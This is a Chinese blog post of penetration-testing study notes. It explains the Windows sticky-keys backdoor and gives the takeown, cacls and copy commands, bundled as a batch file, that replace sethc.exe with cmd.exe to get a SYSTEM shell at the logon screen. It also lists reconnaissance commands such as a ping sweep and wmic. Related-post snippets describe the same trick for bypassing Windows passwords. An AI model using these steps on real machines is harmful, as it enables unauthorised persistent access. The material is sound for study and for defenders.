内网渗透笔记——粘滞键与系统命令信息收集

最新推荐文章于 2024-03-14 14:58:18 发布
最新推荐文章于 2024-03-14 14:58:18 发布
阅读量691 收藏 3
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wang_zui_zui/article/details/122551910
版权

内网渗透流程

信息收集 → 漏洞利用 → 提权 → 后门 → 痕迹清除

kali系统
linux,集合了非常多的渗透测试工具

利用粘滞键走后门

原理:在注销的界面,连续按shift键,依旧会弹出窗口

归根结底跳出来的是一个程序,如果进行程序的改动,就可以被我们利用。

比如:

setch.exe → cmd.exe

操作实现

1、在C盘——Windows——System32路径下找到sethc程序,并尝试进行重命名,发现重命名需要权限。

2、进行所有者的更改

将所有者改为自己的账户

 3、所有者改为自己后,将对自己的所有权限全部允许

 4、对sethc进行一个小小的改名(此时连续按五次shift键不会跳出粘滞键弹窗了),然后将cmd程序复制一份并且更改为sethc程序(其实就是偷梁换柱)

 这个时候再按五次shift键,发现成功调用了cmd程序(但此时没有管理员权限)

5、在注销界面,连续按shift键,发现此时的cmd程序拥有了管理员权限

 其实没有为什么,就是默认是超级用户。

6、同理,可以利用注销界面右下角轻松访问的几个功能用来修改成cmd程序,成为后门

在命令行界面操作实现

需要利用到takeown工具 ,重新分配文件所有权

 takeown /F C:\Windows\System32\sethc.exe /A——更改所有权

 还需要用到cacls工具

显示或者修改文件的访问控制列表

 cacls C:\Windows\System32\sethc.exe /E /G administrators:F

最后再使用copy命令

copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

可以将以上三行命令写成一个bat文件,方便又快捷

```
takeown /F C:\Windows\System32\sethc.exe /A
cacls C:\Windows\System32\sethc.exe /E /G administrator:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
```

信息收集

专业术语——OSINT(开源情报数据)

就是指公开的数据,例如:

```
个人邮箱
公司电话
公司地址
公司法人
```

TTL

可以用来大致辨别一个系统型号,如下

windows NT/2000     TTL=128
windows 95/98        TTL=32
unix                TTL=255
linux                TTL=64
win7                TTL=64

通过icmp协议(ping命令)探测存货主机

利用for命令配合(需进一步详细学习)

for /l %i in (1,1,254) do @ping -w 1 -n 1 192.168.100.%i | findstr "TTL"

第一个1是起始地址,中间的1是步长,最后一个是结束地址

-w 1

-n 1 

| findstr "TTL" :进行一个排除

Windows常用命令

whoami /user  查看用户信息,判断是否需要提权,或者是否有继续渗透的价值

(1001普通用户,500administrator,516域控,501guest,544域管理员)

hostname 查看当前用户名

systeminfo 查看操作系统相关的配置信息(看版本,补丁)

ver 查看windows版本

net

       localgroup——查看组

       share——共享文件夹

       config [server | workstation]

wmic 
    qfe list                    查看补丁
    process        进程相关
        wmic process list brief        查看所有进程信息
        CALL    调用
            wmic process call create calc 调用计算机
            wmic /node:127.0.0.1 process call create calc
    os            系统相关
    product        软件相关
        wmic product list brief

王嘴嘴
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
360屏蔽windows系统.docx
09-26
"360屏蔽Windows系统" 一、概述 在Windows操作系统中,Windows系统是两个常用的热。然而,在某些情况下,这两个可能会干扰到游戏或其他应用程序的正常运行。为了解决这个问题,360安全卫士...
Takeown、Cacls、Icacls-文件、文件夹夺权用法
coffee66666的博客
07-22 1327
常用示例如下: takeown /f 文件名 获取该文件的所属权 takeown /f /r /d n 文件夹 获取整个文件夹及其下面子目录文件的所属权 takeown /f * /a /r /d y 强制将当前目录下的所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators) cacls d:\file1*.* /T /G administrators:F 将所有d:\file1目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制(删除原
络安全笔记-02-win7 系统密码破解
wwxxee
06-11 1100
win7 系统密码破解 原理: 部分win7或者win10 在未进入系统时,可通过系统修复漏洞篡改文件名 连按五次shift会触发程序,该程序名称为sethc.exe程序,所处位置在c:\windows\system32\sethc.exe,将该程序重命名为任意名称,然后复制一个cmd.exe程序,将其重命名为sethc【默认不显示后缀类型】。在重新启动计算机的过程中,按五次shift系统去查找sethc程序,但其实该程序已经为替换为cmd程序,我们就可以利用cmd窗口【此时窗口的权限s
如何修改启动的程序
PanDaoxi
01-24 2443
如何修改启动的程序!
【Windows】替换系统文件
weixin_43642577的博客
02-18 4120
一. 获取C盘编辑的权限 以管理员方式运行cmd, ①cd C:\Windows\System32 ② TAKEOWN /F taskmgr.exe /a ③ icacls taskmgr.exe /grant Administrators:F ④ cd C:\Windows\SysWOW64 ⑤ TAKEOWN /F taskmgr.exe /a ⑥ cacls taskmgr.exe /grant Administrators:F 以上就是获取C盘的权限,这样就
利用总结
prettyX的博客
04-24 3364
Windows系统下,启用盘快捷方式是按5次Shift 方法一 将sethc.exe(程序)替换成cmd.exe,这样在目标机登录页面连续按5下shift可调出cmd命令行 sethc路径:c:\windows\system32 这里有一个权限的问题需要注意,在Windows Vista版本之后的系统,当修改sethc.exe程序名字或将该程序剪切走时,会需要TrustedInstaller权限 TrustedInstaller权限,要高于Administrat
替换为cmd.exe
07-02
在标题中提到的“将替换为cmd.exe”,实际上是一种技巧,可以将原本触发的行为改为启动命令提示符(CMD.exe),这在系统管理和调试时可能会有所帮助。 在Windows XP系统中,这一操作相对简单,因为系统...
漏洞破解系统管理员权限的方法
09-04
利用漏洞来破解管理员权限,在机器上实验过
可自删除 开启3389创建用户后门的vbs
09-06
开启3389创建用户后门,作研究使用,请勿违法。
基于鸟群算法的气动调节阀检测系统
01-27
文中提出了一种气动调节阀特性监测系统以及方法,结合鸟群算法优化了系统计算时效。系统主要包括从待诊断工业调节阀对应的控制回路中,采集一组过程数据,计算过程数据的频率谱,利用鸟群算法确定该过程数据的...
利用五次shift调用cmd程序
m0_69891673的博客
11-15 415
由于我用的虚拟机操作,所以找到D:\Windows\System32\setchc.exe和D:\Windows\System32\cmd.exe(如果是在真实机上面将D该为C),然后将原来的sethc.exe这个程序名改为sethc1.exe,将cmd.exe改为sethc.exe。重启之后会自动弹出一个显示框,选择启动启动修复,然后进入windows的修复界面会经过一段时间的等待。进入点击链接的文本,然后点击右上角的另存为,然后就可以修改和查看windows7上面所有的文件夹了。
Windows后门
最新发布
carmi的博客
03-14 700
此时假如该设备设置了这种的话就可以通过调出cmd窗口(管理员状态)进行用户的创建,并将该用户归入到管理员组当中,就可以实现没有用户信息即可登入设备的操作——后门。在C:/Windows/System32这个目录(系统进程的目录)下可找到sethc这个应用程序(系统进程)。出现这种情况的原因是:由于刚刚已经将权限给到管理员,但管理员的权限始终未变化,所以还是不能修改文件名称(提高)。右cmd属性打开发现Administrators这个组的成员根本没有对该文件的完全控制权限。
利用破解Windows7密码
浅时光-Trister
08-22 1719
指的是电脑使用中的一种快捷,专为同时按下两个或多个有困难的人而设计的。的主要功能是方便Shift等的组合使用。 可以先按一个位(如shift),再按另一位,而不是同时按下两个位,方便某些因身体原因而无法同时按下多的人。一般的电脑连按五次shift会出现提示。 原理 可以以连续按5下SHIFT运行,并且此时应用程序会以WINDOWS的最高权限-SYSTEM权限运行,所以我们将sethc替换成cmd,这样,cmd就会拥有高权限。 实验 1、启动虚拟机,在启动
wmic 远程 执行 脚本
mtAsnow
09-02 2922
wmic /node:127.0.0.1 /user:“user_name” /password:“your_pwd” process call create “cmd /c c:\ & sip.bat” 脚本 只能 在其目录下执行,前面不能加路径。
多台服务器批处理文件,如何来ping多台服务器和返回的IP地址和主机名使用批处理脚本?(How to ping multi...
weixin_28974337的博客
08-12 473
所以,我必须使用批处理只为这一点。 基本上,的服务器主机名都列在一个txt文件。 我用下面的代码来ping所有的服务器,并在txtfile显示其结果。For /f %%i in (testservers.txt) do ping -n 1 %%i >>pingtest.txt以上ping的所有服务器。 现在,我要输出的IP地址,并在一个单独的文件中的主机名。 我怎样才能做到这一...
渗透测试之Vulnstack1内渗透
LvHLong的博客
04-27 3309
使用dirsearch扫描目录 python dirsearch.py -u http://192.168.234.177/ -i 200,301 发现备份文件 beifen.rar 和 phpmyadmin 使用 Nmap 扫描
+脱机隐私声明破解win7开机密码
每天累计一滴水 十天后变成一大滴水 一百天后变成一杯水
07-23 1244
介绍 1) 是windows里的一个程序,就是在开机后,未输入账号密码未登录时,敲击5次shift即可出,如图: 就是个程序。 2)脱机隐私声明 在第一次电脑开启过程中强制关机,则在第二次开机时,就会出现如下页面,如图: 我们选择第一项,启动修复,如图: 就会出现启动修复的一些详细信息,大家仔细看下这个, 这是一个本地的txt文件,我们就是利用这里文件,进行 “狸猫换太子”。 2. 原理 计算机调用程序的时候,就是通过文件名称,包括破解软件的时候,也是这个道理。 在这里,.
Win7 漏洞利用绕过登录密码
老司机开代码的博客
09-26 4354
文章目录1. 原理2. 利用 1. 原理 在win7登录界面,连按5次Shift,则会弹出提示。而此程序的路径位于c:\windows\system32路径下。可以将此程序的路径掉包成cmd,实现在登录界面弹出cmd命令行,重置登录密码实现登录。 2. 利用 首先开启win7,在启动的过程中直接断电强制关机。然后再次启动,win7会出现一个修复的界面。我们选择修复排查问题那一选项。 然后windows会建议我们还原系统,这里选择取消。 取消后,会等待比较长的一段时间。 这里选择查看问题详细信息
渗透学习01——内信息收集笔记
box
03-06 5432
信息收集信息收集概述   渗透测试进入内阶段,面对一片 “黑暗森林” 。所以首先对当前的络环境进行判断。 我是谁? —— 对当前机器角色进行判断。 这在哪? —— 对当前机器所处的络环境和拓扑结构进行分析和判断。 我在哪? —— 对当前机器所处区域进行判断。   对当前计算机角色判断,是指判断当前计算机是普通Web服务器、FTP服务器、代理服务器、DNS服务器等   对当前计算机所处络环境的拓扑结构分析和判断,是指对所在的内进行全面的数据收集和分析整理,绘制出大致的内结构拓扑图。
麒麟系统 取消
07-28
取消麒麟系统功能可以通过修改配置文件来实现。根据引用\[3\]中提供的信息,你可以按照以下步骤进行操作: 1. 打开终端或命令行界面,使用文本编辑器打开配置文件/etc/X11/xorg.conf。 2. 在文件中找到名为"InputDevice"的部分,该部分包含有关输入设备的配置信息。 3. 在"InputDevice"部分中找到"Option"行,其中包含"EmulateWheel"、"EmulateWheelButton"和"EmulateWheelTimeout"等选项。 4. 将"EmulateWheelTimeout"选项的值修改为较大的数值,例如1000,以禁用功能。 5. 保存并关闭文件。 6. 重新启动系统或重新加载X服务器,以使更改生效。 请注意,修改配置文件可能需要管理员权限。在进行任何系统配置更改之前,请确保备份重要数据,并谨慎操作。 #### 引用[.reference_title] - *1* *2* [云计算笔记(Linux入门)](https://blog.csdn.net/qq_43764558/article/details/107780702)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [取消Linux下的鼠标中贴功能](https://blog.csdn.net/iteye_15801/article/details/81733501)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值